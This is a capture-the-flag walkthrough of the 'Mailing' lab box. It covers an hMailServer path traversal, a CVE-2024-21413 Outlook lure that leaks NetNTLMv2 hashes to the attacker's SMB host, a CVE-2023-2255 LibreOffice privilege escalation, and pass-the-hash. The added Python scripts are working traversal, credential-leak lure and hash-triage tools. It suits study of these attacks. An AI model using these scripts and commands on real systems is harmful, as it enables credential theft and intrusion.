Mailing
By replican
Mailing Windows · Easy
User TL;DR
LFI (arbitrary file read via path traversal) in download.php on port 80
Cracking the unsalted MD5 of the hMailServer administrator password from hMailServer.INI
Zero-click NetNTLMv2 leak through Outlook (CVE-2024-21413) captured with Responder
Root TL;DR
LibreOffice 7.4 CVE-2023-2255 to add maya to the local Administrators group
Dump the SAM and pass the hash as localadmin
User Flag
First, scan the target with nmap:
# Nmap 7.94 scan initiated Thu May 16 02:37:04 2024 as: nmap -sC -sV --verbose -oN reports_10.129.231.40 10.129.231.40
Nmap scan report for 10.129.231.40
Host is up (0.064s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open ssl/imap hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-15T19:37:36
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 16 02:38:16 2024 -- 1 IP address (1 host up) scanned in 71.32 seconds
SMB, SMTP/POP3/IMAP (hMailServer) and HTTP (IIS) are open. Two details matter later: port 587 offers STARTTLS with AUTH LOGIN/PLAIN, and SMB signing is enabled but not required.
Go straight to initial discovery on port 80. The http-title shows a redirect to http://mailing.htb, so add it to /etc/hosts first:
10.129.231.40 mailing.htb
The service banners already tell us the mail stack is hMailServer.
First user initial foothold
A quick exploit search turns up an LFI for hMailServer: https://www.exploit-db.com/exploits/7012
The path that entry uses isn't present on this host, so run dirsearch against the web root instead:
200 31B http://mailing.htb/download.php
download.php takes a file name, so feed it the traversal payload.
The exploit-db entry walks into plain "Program Files", which returns 404 here; switching to "Program Files (x86)" works and hMailServer.INI downloads.
cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
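The fetch-and-parse step above, as an added example (my code, not the author's): it tries the traversal through download.php for both install roots, parses the INI and pulls out the crackable hash. The `file` parameter name and the Bin\hMailServer.INI location are assumptions (the page shows the file's contents, not the exact request); the embedded sample is a copy of the INI shown above so the parsing part runs offline.

```python
import configparser
import hashlib
import urllib.error
import urllib.parse
import urllib.request

# Assumption: download.php takes the file name in a `file` query parameter.
DOWNLOAD_URL = "http://mailing.htb/download.php"

# Assumption: hMailServer keeps hMailServer.INI in its Bin folder. Both
# install roots are tried; on this box "Program Files" 404s and "(x86)" works.
CANDIDATE_PATHS = [
    "../../../../Program Files (x86)/hMailServer/Bin/hMailServer.INI",
    "../../../../Program Files/hMailServer/Bin/hMailServer.INI",
]

# Copy of the INI shown above, embedded so the parsing runs offline.
SAMPLE_INI = r"""
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
"""


def fetch_ini(base=DOWNLOAD_URL, timeout=10):
    """Try each traversal path; return (path, body) for the first that works."""
    for path in CANDIDATE_PATHS:
        url = base + "?file=" + urllib.parse.quote(path)
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", errors="replace")
        except OSError:          # HTTPError (404 for the wrong root) or no route
            continue
        if "[Security]" in body:
            return path, body
    return None, None


def extract_secrets(ini_text):
    """Pull the fields an attacker cares about out of hMailServer.INI."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    return {
        "program_folder": cp["Directories"]["ProgramFolder"],
        # Unsalted MD5 of the admin password: crack as Raw-MD5 / hashcat -m 0.
        "admin_md5": cp["Security"]["AdministratorPassword"].strip().lower(),
        # PasswordEncryption=1 means the DB password is hMailServer's own
        # reversible encryption, not a hash; it is not a john/hashcat target.
        "db_password": cp["Database"]["Password"].strip(),
        "db_password_crackable": cp["Database"].get("PasswordEncryption", "0") != "1",
    }


def check_candidate(admin_md5, candidate):
    """Unsalted MD5 means a single hashlib call verifies any guess."""
    return hashlib.md5(candidate.encode()).hexdigest() == admin_md5


if __name__ == "__main__":
    path, body = fetch_ini()
    secrets = extract_secrets(body if body else SAMPLE_INI)
    with open("administrator.hash", "w") as fh:
        fh.write(secrets["admin_md5"] + "\n")
    print("hash written from", path or "embedded sample")
```

Run it from the attacking host with mailing.htb in /etc/hosts; the resulting administrator.hash is the input for the john run below.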
AdministratorPassword is an unsalted MD5 of the hMailServer admin password, so drop it into a file and crack it as Raw-MD5 (the [Database] Password is not a hash: PasswordEncryption=1 marks it as hMailServer's own reversible encryption, so it cannot be cracked this way and isn't needed here):
cat administrator.hash
841bb5acfa6779ae432fd7a4e6600ba7
sudo john administrator.hash --wordlist=/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt --format=Raw-Md5
[sudo] password for replican:
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
homenetworkingadministrator (?)
1g 0:00:00:00 DONE (2024-05-16 04:39) 3.030g/s 22915Kp/s 22915Kc/s 22915KC/s homepc..homeiyun88
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
That gives us the mail credentials:
administrator@mailing.htb:homenetworkingadministrator
Second user initial foothold
Back on port 80, open instruction.pdf (the download button at the bottom of the page).
It tells us that mail sent to maya gets read (we assume a bot opens every new message automatically).
That immediately brings to mind the recent exploit in Outlook's mail handling, CVE-2024-21413 (I only found out about it from a hint on the HTB forum).
So we pair the CVE PoC with Responder for a zero-click credential leak: the PoC mails maya a file:// link pointing at our host, Outlook resolves it and authenticates to our SMB listener, and Responder (started beforehand on the VPN interface) captures maya's NetNTLMv2 challenge-response. The mail is submitted through the server's own port 587 (STARTTLS + AUTH) using the administrator mailbox credentials we just cracked:
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url "\\10.10.14.45" --subject XD
[SMB] NTLMv2-SSP Client : 10.129.231.40
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:e6a1aa4dfd95ab9f...
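What the PoC actually sends, as an added example (my reconstruction, not the PoC's code): a multipart mail whose HTML part carries a file:// UNC hyperlink followed by "!", the suffix that makes Outlook treat the link as a moniker and resolve it without the usual Protected View prompt, so the client authenticates to the SMB host named in the link. The share/file name, subject and the Responder command are assumptions; start Responder before sending.

```python
import smtplib
import ssl
from email.message import EmailMessage


def build_lure(sender, recipient, attacker_host, subject="XD"):
    """HTML mail whose only link is file:///\\\\attacker\\share\\doc.txt!lure."""
    # The trailing "!lure" is the whole trick (CVE-2024-21413): it turns the
    # hyperlink into a composite moniker that Outlook resolves, and resolving a
    # UNC path means an SMB connection, and thus NTLM authentication, to us.
    unc = f"\\\\{attacker_host}\\share\\doc.txt"      # assumed share/file name
    link = f"file:///{unc}!lure"
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content("Please open the attached document.")
    msg.add_alternative(
        f'<html><body><p>Please open the <a href="{link}">document</a>.</p></body></html>',
        subtype="html",
    )
    return msg


def lure_link(msg):
    """Return the href embedded in the HTML part (used to double-check the lure)."""
    html = msg.get_body(preferencelist=("html",)).get_content()
    start = html.index('href="') + len('href="')
    return html[start:html.index('"', start)]


def send_lure(msg, server="mailing.htb", port=587, username=None, password=None):
    """Submit through the victim's own MSA port: nmap showed STARTTLS and
    AUTH LOGIN/PLAIN on 587. Run `sudo responder -I tun0` (assumed interface)
    first so the SMB connection Outlook makes has something to talk to."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # self-signed mailing.htb certificate
    ctx.verify_mode = ssl.CERT_NONE
    with smtplib.SMTP(server, port, timeout=15) as s:
        s.ehlo()
        s.starttls(context=ctx)
        s.login(username, password)
        s.send_message(msg)


if __name__ == "__main__":
    lure = build_lure("administrator@mailing.htb", "maya@mailing.htb", "10.10.14.45")
    print("sending lure with link:", lure_link(lure))
    send_lure(lure, username="administrator@mailing.htb",
              password="homenetworkingadministrator")
```

The only part that needs the real target is send_lure; build_lure and lure_link work offline, which is how to sanity-check the href before pointing it at a victim.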
Responder now holds maya's NetNTLMv2 challenge-response. Crack it with hashcat in mode 5600 (NetNTLMv2), e.g. hashcat -m 5600 <hashfile> rockyou.txt:
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 491 MB
Dictionary cache hit:
* Filename..: /home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f662632271430:010100000000000000e3947642a7da01e6a5c7f43a9af34d000000000200080032004d005300510001001e00570049004e002d00360033005a003900390041004e004f0059005100580004003400570049004e002d00360033005a003900390041004e004f005900510058002e0032004d00530051002e004c004f00430041004c000300140032004d00530051002e004c004f00430041004c000500140032004d00530051002e004c004f00430041004c000700080000e3947642a7da0106000400020000000800300030000000000000000000000000200000b5b650195ccf25da9e362f08460df10a6043234f3b80de71cd2b446a1f46ff9d0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340035000000000000000000:m4y4ngs4ri
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f...000000
Time.Started.....: Thu May 16 03:42:48 2024 (1 sec)
Time.Estimated...: Thu May 16 03:42:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 19633.9 kH/s (3.17ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7340032/14344384 (51.17%)
Rejected.........: 0/7340032 (0.00%)
Restore.Point....: 5505024/14344384 (38.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: minterwint -> ina-123456
Hardware.Mon.#1..: Temp: 52c Fan: 49% Util: 19% Core:1837MHz Mem:7300MHz Bus:16
Started: Thu May 16 03:42:42 2024
Stopped: Thu May 16 03:42:49 2024
Cracked. Log in over WinRM with evil-winrm:
evil-winrm -i 10.129.231.40 -u maya -p m4y4ngs4ri
The user flag is on maya's Desktop.
Root Flag
First root initial foothold
List Program Files to see what is installed:
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program
"C:/Program Files (x86)/" "C:/Program Files/" "C:/ProgramData"
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program Files/"
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShell
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/"
"C:/Program Files/LibreOffice/CREDITS.fodt" "C:/Program Files/LibreOffice/help/" "C:/Program Files/LibreOffice/program/"
"C:/Program Files/LibreOffice/LICENSE.html" "C:/Program Files/LibreOffice/license.txt" "C:/Program Files/LibreOffice/readmes/"
"C:/Program Files/LibreOffice/NOTICE" "C:/Program Files/LibreOffice/presets/" "C:/Program Files/LibreOffice/share/"
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en"
Cannot find path 'C:\Program Files\LibreOffice\readmes\readme_en' because it does not exist.
At line:1 char:1
+ cat "C:/Program Files/LibreOffice/readmes/readme_en"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Program File...admes\readme_en:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en-US.txt"
======================================================================
LibreOffice 7.4 ReadMe
The ReadMe shows LibreOffice 7.4, which is affected by CVE-2023-2255 (floating frames linked from a document are loaded without prompting the user): https://www.libreoffice.org/about-us/security/advisories/CVE-2023-2255. The public PoC builds an .odt that runs a command when the document is opened:
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'
The command adds maya to the local Administrators group, which on this Spanish-localized install is called Administradores (the SAM dump below lists Administrador and Invitado), so that we can dump the SAM afterwards.
Upload exploit.odt to C:\Important Documents and wait for it to be opened. Confirm with net localgroup Administradores from the shell; the new membership only applies to logons made after the change, so reconnect with evil-winrm before relying on it.
Second root initial foothold
maya is now a local administrator, so dump the SAM and take localadmin's NT hash:
crackmapexec smb 10.129.231.40 -u maya -p m4y4ngs4ri --sam
SMB 10.129.231.40 445 MAILING [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.231.40 445 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB 10.129.231.40 445 MAILING [*] Dumping SAM hashes
SMB 10.129.231.40 445 MAILING Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB 10.129.231.40 445 MAILING localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB 10.129.231.40 445 MAILING maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB 10.129.231.40 445 MAILING [+] Added 6 SAM hashes to the database
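A small triage script for the dump above, added here and not part of the original writeup: it parses the crackmapexec lines (embedded as sample input), flags accounts whose NT hash is the empty-password value, turns the rest into pass-the-hash commands, and recomputes an NT hash (MD4 over the UTF-16LE password) so a cracked password can be checked against the dump. MD4 is implemented in pure Python because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password (MD4 of "")

# The six lines crackmapexec printed above, used as sample input.
SAMPLE_DUMP = """
SMB 10.129.231.40 445 MAILING Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB 10.129.231.40 445 MAILING localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB 10.129.231.40 445 MAILING maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
"""


def parse_sam(dump_text):
    """Parse secretsdump-style user:rid:lm:nt::: records, with or without the
    crackmapexec 'SMB host port NAME' prefix in front of them."""
    rows = []
    for line in dump_text.splitlines():
        if ":::" not in line:
            continue
        user, rid, lm, nt = line.split()[-1].split(":")[:4]
        rows.append({
            "user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "empty_password": nt.lower() == EMPTY_NT,   # no password set
            "builtin_admin": int(rid) == 500,
        })
    return rows


def pth_targets(rows, host):
    """Accounts whose NT hash is worth passing. Empty-password entries are
    skipped: there is nothing to pass, and a RID-500 account with the empty
    hash is the built-in Administrator that was never enabled."""
    return [f'evil-winrm -i {host} -u {r["user"]} -H "{r["nt"]}"'
            for r in rows if not r["empty_password"]]


def _md4(data):
    """Pure-Python MD4 (RFC 1320)."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (range(16), 0x00000000, (3, 7, 11, 19), F),
        ((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), 0x5A827999, (3, 5, 9, 13), G),
        ((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), 0x6ED9EBA1, (3, 9, 11, 15), H),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for order, k, shifts, fn in rounds:
            for j, i in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[i] + k) & mask, shifts[j % 4])
                a, b, c, d = d, a, b, c          # rotate roles: next target is old d
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)), exactly what the SAM stores."""
    return _md4(password.encode("utf-16-le")).hex()


def password_matches(rows, user, password):
    """True if `password` hashes to the NT hash dumped for `user`."""
    return any(r["user"].lower() == user.lower() and r["nt"] == nt_hash(password)
               for r in rows)


if __name__ == "__main__":
    rows = parse_sam(SAMPLE_DUMP)
    for r in rows:
        print(f'{r["user"]:20} rid={r["rid"]:<5} empty_password={r["empty_password"]}')
    print("\n".join(pth_targets(rows, "10.129.231.40")))
    print("maya's dumped hash matches m4y4ngs4ri:", password_matches(rows, "maya", "m4y4ngs4ri"))
```

The check against maya's line is a useful habit: if the recomputed NT hash of a password you already cracked matches the dump, the dump is consistent with the credentials you hold and the remaining hashes can be trusted as pass-the-hash material.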
Administrador (RID 500) only carries the empty-password NT hash 31d6cfe0d16ae931b73c59d7e0c089c0, i.e. no password is set and the built-in account is almost certainly disabled, so localadmin is the account to pass the hash for:
evil-winrm -i 10.129.231.40 -u localadmin -H "9aa582783780d1546d62f2d102daefae"
Done: the root flag is on localadmin's Desktop.